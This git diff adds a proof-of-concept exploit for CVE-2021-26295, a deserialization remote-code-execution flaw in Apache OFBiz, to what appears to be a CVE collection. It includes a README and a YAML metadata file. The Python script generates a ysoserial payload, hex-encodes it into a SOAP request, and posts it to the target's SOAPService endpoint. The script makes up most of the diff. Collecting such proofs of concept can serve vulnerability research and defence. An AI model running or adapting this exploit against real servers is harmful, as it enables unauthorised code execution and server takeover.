diff --git a/cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py b/cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py
new file mode 100644
index 0000000000000000000000000000000000000000..077956e3e4d487d7e1aa665e9a843984668f85f9
--- /dev/null
+++ b/cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py
@@ -0,0 +1,28 @@
+import requests
+import sys
+import subprocess
+import binascii
+from urllib3.exceptions import InsecureRequestWarning
+
+def transfor(content):
+    return binascii.hexlify(content)
+def main():
+    res = subprocess.Popen(['java','-jar', 'ysoserial.jar', "URLDNS", dnslog, '>data.ot'], shell=True)
+    res.wait()
+    with open('data.ot','rb') as f:
+        content = f.read()
+    hex_data = transfor(content)
+    headers = {'Content-Type': 'text/xml'}
+    post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/"><ns1:cus-obj>%s</ns1:cus-obj></ns1:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_data
+    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+    try:
+        res = requests.post('%s/webtools/control/SOAPService' % host , data = post_data , headers = headers , verify=False)
+        if  res.status_code == 200 :
+            print("[+]Done! check your dnslog: " + dnslog)
+    except:
+        print("[!]Request error!")
+
+if __name__ == '__main__':
+	host = sys.argv[1]
+	dnslog = sys.argv[2]
+	main()
diff --git a/cve/apache-OFBiz/2021/CVE-2021-26295/README.md b/cve/apache-OFBiz/2021/CVE-2021-26295/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..005b35662e0449bc1dc8fb34b22858c233234318
--- /dev/null
+++ b/cve/apache-OFBiz/2021/CVE-2021-26295/README.md
@@ -0,0 +1,4 @@
+# CVE-2021-26295-Apache-OFBiz
+CVE-2021-26295 Apache OFBiz rmi反序列化POC
+
+需要将ysoserial.jar放置在目录下，且不能使用java的高版本
diff --git a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..16b59c306cdbe0bbfa2771f8ff8443b4c6da3074
--- /dev/null
+++ b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml
@@ -0,0 +1,21 @@
+id: CVE-2021-26295
+source: https://download.csdn.net/download/weixin_42165508/16093364?utm_medium=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&depth_1-utm_source=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&dest=https%3A%2F%2Fdownload.csdn.net%2Fdownload%2Fweixin_42165508%2F16093364&spm=1003.2020.3001.6616.16
+info:
+  name: Apache OFBiz是一个电子商务平台，用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。
+  severity: critical
+  description:
+    CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞，攻击者可构造恶意请求，触发反序列化，从而造成任意代码执行，控制服务器。
+
+  scope-of-influence:
+    Apache OFBiz < 17.12.06
+  reference:
+    - https://blog.csdn.net/weixin_39811856/article/details/115238985
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-26295
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-26295
+    cwe-id: CWE-502
+    cnvd-id: None
+    kve-id: None
+  tags: cve2020, Apache, OFBiz
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 9bd0c3cc79ce071c9eb5e6ec281174759905e9fb..b580a93c798aa66de8f073dde6f4f91e4fcfac40 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -14,6 +14,8 @@ cve:
   apache-Dubbo:
     - CVE-2021-43297
     - CVE-2021-25641 
+  apache-OFBiz:
+    - CVE-2021-26295
   apache-log4j:
     - CVE-2021-44228
   apache-solr: